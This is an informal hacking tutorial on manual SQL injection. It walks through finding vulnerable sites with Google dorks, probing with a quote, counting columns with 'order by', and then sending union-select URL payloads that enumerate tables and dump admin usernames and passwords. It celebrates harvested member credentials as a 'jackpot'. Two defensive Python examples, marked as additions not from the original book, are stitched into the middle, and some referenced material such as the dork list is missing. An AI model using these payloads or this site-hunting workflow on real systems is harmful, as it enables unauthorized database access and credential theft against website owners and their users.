ALL ABOUT MANUAL SQL Injection
All information provided in this book is only for educational purposes; if
anyone is found in an illegal activity then we have no responsibility
for this.
An Important Note Before Starting
Hacking is an art of intelligence; if you don't have this art then leave the book now
and take a rest, otherwise you will get a headache. If you are experienced in
this art then you will understand it very easily. Just remember one thing: no
special skills are needed to learn something new, only a positive mind that is
always open and sharp enough to understand.
Complete Guide to SQL Injection:
Before we see what SQL injection is, we should know what SQL and a database are.
A database is a collection of data. From a website's point of view, the database is used for storing user
ids, passwords, web page details and more.
Some databases are:
DB servers,
MySQL (open source),
PostgreSQL (open source).
SQL stands for Structured Query Language. In order to communicate with the database, we
use SQL queries. We are querying the database, so it is called a query language.
Definition from the Complete Reference:
SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.
Simple Basic Queries for SQL:
select * from table_name;
This statement is used for showing the content of a table, including the column names.
select * from users;
insert into table_name(column_names, ...) values(corresponding values for the columns);
For inserting data into a table.
insert into users(username,userid) values("BreakTheSec","break");
I will give more details and queries about SQL in my next book.
What is SQL Injection?
SQL injection is a common and famous method of hacking at present. Some newbies think that
this is a small thing because of some kiddie or scripted software like "Havij", but if you look at it manually then
it is a huge topic and many books could easily be written on it. Using this method an unauthorized
person can access the database of a website. The attacker can get all details from the database.
What can an attacker do?
Accessing secret data
Modifying contents of the website
Shutting down the MySQL server
Now let's dive into the real procedure for SQL injection.
Our best partner for SQL injection is Google. We can find vulnerable websites (hackable websites)
using a Google dork list. Google dorking is searching for vulnerable websites using Google search
tricks. There are a lot of tricks for searching in Google, but we are going to use the "inurl:" operator for finding
vulnerable websites.
If you want to find out more, then search on Google for the latest SQL dorks.
How to use?
Copy one of the above commands and paste it in the Google search box.
Hit enter.
You will get a list of websites.
We have to visit the websites one by one to check for the vulnerability.
So start from the first website.
If you would like to hack a particular website, then try this:
Now we should check the vulnerability of the website. In order to check the vulnerability, add a single
quote (') at the end of the URL and hit enter. (No space between the number and the single quote.)
If the page stays the same, or shows "page not found", or shows some other web page,
then it is not vulnerable.
If it shows any error which is related to the SQL query, then it is vulnerable. Cheers..!!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
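The error above is the symptom a defender needs to design out. As an added example that is not part of the original book, here is the vulnerable string-concatenation pattern beside its parameterized replacement, using Python's built-in sqlite3 as a stand-in for the PHP/MySQL site and a constructed pages table (both assumptions): the unsafe query turns the trailing quote into a database error, while the bound-parameter query treats the same input as data and simply returns no row.

```python
import sqlite3


def make_db():
    """Constructed sample database standing in for the site's content table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", [(1, "Home"), (2, "News")])
    return conn


def lookup_unsafe(conn, user_id):
    """Vulnerable pattern: raw input is concatenated into the SQL text.
    A trailing quote breaks the grammar, and the database error that results
    is exactly the signal the single-quote check above looks for."""
    return conn.execute("SELECT title FROM pages WHERE id = " + user_id).fetchall()


def lookup_safe(conn, user_id):
    """Hardened form: the value is bound as a parameter, so the database never
    parses it as SQL. Non-numeric input is rejected before it reaches the query."""
    if not user_id.lstrip("-").isdigit():
        return []
    return conn.execute("SELECT title FROM pages WHERE id = ?", (int(user_id),)).fetchall()


def probe(handler, user_id):
    """Run one lookup and report ('rows', result) or ('error', message): the two
    outcomes the vulnerability check distinguishes. A real application must map
    the 'error' case to a generic response so the message never reaches the page."""
    conn = make_db()
    try:
        return ("rows", handler(conn, user_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        conn.close()


if __name__ == "__main__":
    for handler in (lookup_unsafe, lookup_safe):
        for value in ("2", "2'"):
            print(handler.__name__, repr(value), "->", probe(handler, value))
```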
Now we have found that the website is vulnerable. The next step is to find the number of columns in the table.
For that, replace the single quote (') with an "order by n" statement. (Leave one space between the number and
the order by n statement.)
Change n to 1, 2, 3, 4, 5, 6, ... n until you get an error like "unknown column".
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
Change the number until you get the error "unknown column".
If you get the error while trying the "x"th number, then the number of columns is "x-1".
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)
So now x=8; the number of columns is x-1, i.e. 7.
Sometimes the above may not work. In that case add "--" at the end of the statement.
http://www.victimsite.com/index.php?id=2 order by 1--
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the
"order by n" with this statement, and change the id value to negative (I mean id=-2; it must be changed, but on
some websites it may work without changing).
Replace the columns_sequence with the numbers from 1 to x-1 (number of columns) separated with
If the number of columns is 7, then the query is as follows:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
It will show some numbers on the page (each must be less than or equal to the 'x' value, I mean less than or equal to the number
of columns).
Now select one number.
It is showing 3 and 7. Let's take the number 3.
Now replace the 3 in the query with "version()".
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
It will show the version as 5.0.1 or 4.3, something like this.
Replace version() with database() and user() for finding the database and the user respectively.
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
and 1=2 union select 1,2,user(),4,5,6,7--
If the above is not working, then try this:
http://www.victimsite.com/index.php?id=-2and 1=2 union select
If the version is 5 or above, then follow these steps. Now we have to find the table names of the
database. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" at the end:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select
1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where
table_schema=database()--
Now it will show the list of table names. Find the table name which is related to the admin or user.
Now select the "admin" table.
If the version is 4 or something else, you have to guess the table names (user, tbluser). It is hard and boring
to do SQL injection with version 4.
Now replace "group_concat(table_name)" with "group_concat(column_name)".
Replace "from information_schema.tables where table_schema=database()--" with "from
information_schema.columns where table_name=mysqlchar--".
Now listen carefully: we have to convert the table name to a MySQL CHAR() string and replace
mysqlchar with that.
Find MySQL CHAR() for the table name:
First of all install the HackBar addon:
This will open a small window; enter the table name which you found. I am going to use the admin
table name.
Now you can see the CHAR(numbers separated with commas) in the HackBar toolbar.
Copy and paste the code at the end of the URL instead of "mysqlchar":
http://www.victimsite.com/index.php?id=-2 and 1=2 union select
1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where
table_name=CHAR(97, 100, 109, 105, 110)--
Now it will show the list of columns.
Now replace group_concat(column_name) with
columnname should be replaced with one of the listed column names.
anothercolumnname should be replaced with another of the listed column names.
Now replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105,
110)" with "from table_name":
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
Sometimes it will show that the column is not found.
Then try other column names.
Now it will show the usernames and passwords.
If the website has members then jackpot for you. You will have the list of usernames and passwords.
Sometimes you may have the email ids also. Enjoy, you got the duck which can produce the golden
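Every step of the walk-through above (the quote probe, the "order by n" loop, the union select, the information_schema queries and the CHAR() encoding) leaves a distinctive request in the web server's access log. As an added example that is not from the original book, this Python scanner runs over constructed Apache-style log lines (an assumption, not real traffic), URL-decodes each request path, tags it with the stages it matches, and groups the stages by client address, since one client advancing through several stages is a far stronger signal than any single request.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=2%27 HTTP/1.1" 500 612
203.0.113.5 - - [10/Oct/2023:13:55:51 +0000] "GET /index.php?id=2%20order%20by%208-- HTTP/1.1" 500 601
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=-2%20and%201=2%20union%20select%201,2,version(),4,5,6,7-- HTTP/1.1" 200 4870
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /index.php?id=-2%20and%201=2%20union%20select%201,2,group_concat(column_name),4,5,6,7%20from%20information_schema.columns%20where%20table_name=CHAR(97,100,109,105,110)-- HTTP/1.1" 200 4901
198.51.100.7 - - [10/Oct/2023:13:57:00 +0000] "GET /about.php HTTP/1.1" 200 2210
"""

# One signature per stage of the manual walk-through, matched against the decoded path.
SIGNATURES = [
    ("quote_probe", re.compile(r"=[^&\s]*'")),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enumeration", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("char_encoding", re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)*\s*\)", re.I)),
]

# Client IP, request path and status code are all the detection needs from a log entry.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def scan_log(text):
    """Return (ip, status, [matched stage names]) for every request matching a signature."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Decode %20, %27 etc. first so encoded payloads cannot slip past the patterns.
        path = unquote_plus(m.group("path"))
        names = [name for name, rx in SIGNATURES if rx.search(path)]
        if names:
            hits.append((m.group("ip"), int(m.group("status")), names))
    return hits


def stages_per_ip(hits):
    """Group matched stages by client: one client walking probe -> column count ->
    union -> schema enumeration is the pattern worth alerting on."""
    stages = {}
    for ip, _status, names in hits:
        stages.setdefault(ip, set()).update(names)
    return stages


if __name__ == "__main__":
    for ip, stages in stages_per_ip(scan_log(SAMPLE_LOG)).items():
        print(ip, "reached", len(stages), "of", len(SIGNATURES), "stages:", sorted(stages))
```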
Finding the admin panel is boring and time-taking work, because you have to guess the admin panel like:
If you have luck, you will find the admin page.
If you want the latest admin URL list then search for it on Google, or it is better to use an admin panel script
in Perl.